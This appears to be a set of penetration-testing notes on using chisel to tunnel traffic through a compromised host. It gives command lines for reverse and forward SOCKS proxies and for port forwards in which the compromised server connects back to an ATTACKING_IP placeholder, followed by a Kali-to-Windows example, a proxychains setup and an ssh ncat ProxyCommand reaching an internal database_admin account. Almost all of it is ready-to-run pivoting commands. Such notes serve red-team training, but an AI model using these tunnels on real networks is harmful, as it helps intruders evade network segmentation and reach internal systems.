chisel

• can use used to set up a tunneled proxy or port forward

• doesn't require ssh

• copy the files from github and extract with gunzip *

• there must be an appropriate copy of the chisel binary on both the attacking machine and compromised server

• Reverse Socks Proxy

  • set up a listener on your chosen port

    ./chisel serve -p listenport --reverse &

  • on the compromised host do:

    ./chisel client ATTACKING_IP:LISTEN_PORT R:socks &

• Forward Socks

  • rarer than reverse proxies

  • on the compromised host use:

    ./chisel server -p LISTEN_PORT --socks5

  • on the attacking box

    ./chisel client targetip:listen_port proxy_port:socks

• Remote Proxy Forward

  • for when we connect back from a compromised target to create the forward

  • on the attacking machine

    ./chisel server -p LISTENPORT --reverse &

  • from the compromised serve

    ./chisel client ATTACKING_IP:LISTEN_PORT R:LOCAL_PORT:TARGET_IP:TARGET_PORT &

• Local Port Forward

  • on the compromised server

    ./chisel serve -p LISTERN_PORT

  • on the attacking machine

    • ./chisel client LISTEN_IP:LISTEN_PORT LOCAL_PORT:TARGET_IP:TARGET_PORT

Start the chisel server on kali

./chisel server -p 8000 -reverse

upload and start client on windows machine

.\chisel.exe client <kali ip>:8000 R:socks

configure Proxychain:

sudo vim /etc/proxy

sudo vim /etc/proxychains4.conf

comments out the existing socks4 127.0.0.1 and add the below

socks5 127.0.0.1 1080

proxychains4 commandtoexecute

or

ssh -o ProxyCommand='ncat --proxy-type socks5 --proxy 127.0.0.1:1080 %h %p' database_admin@10.4.50.215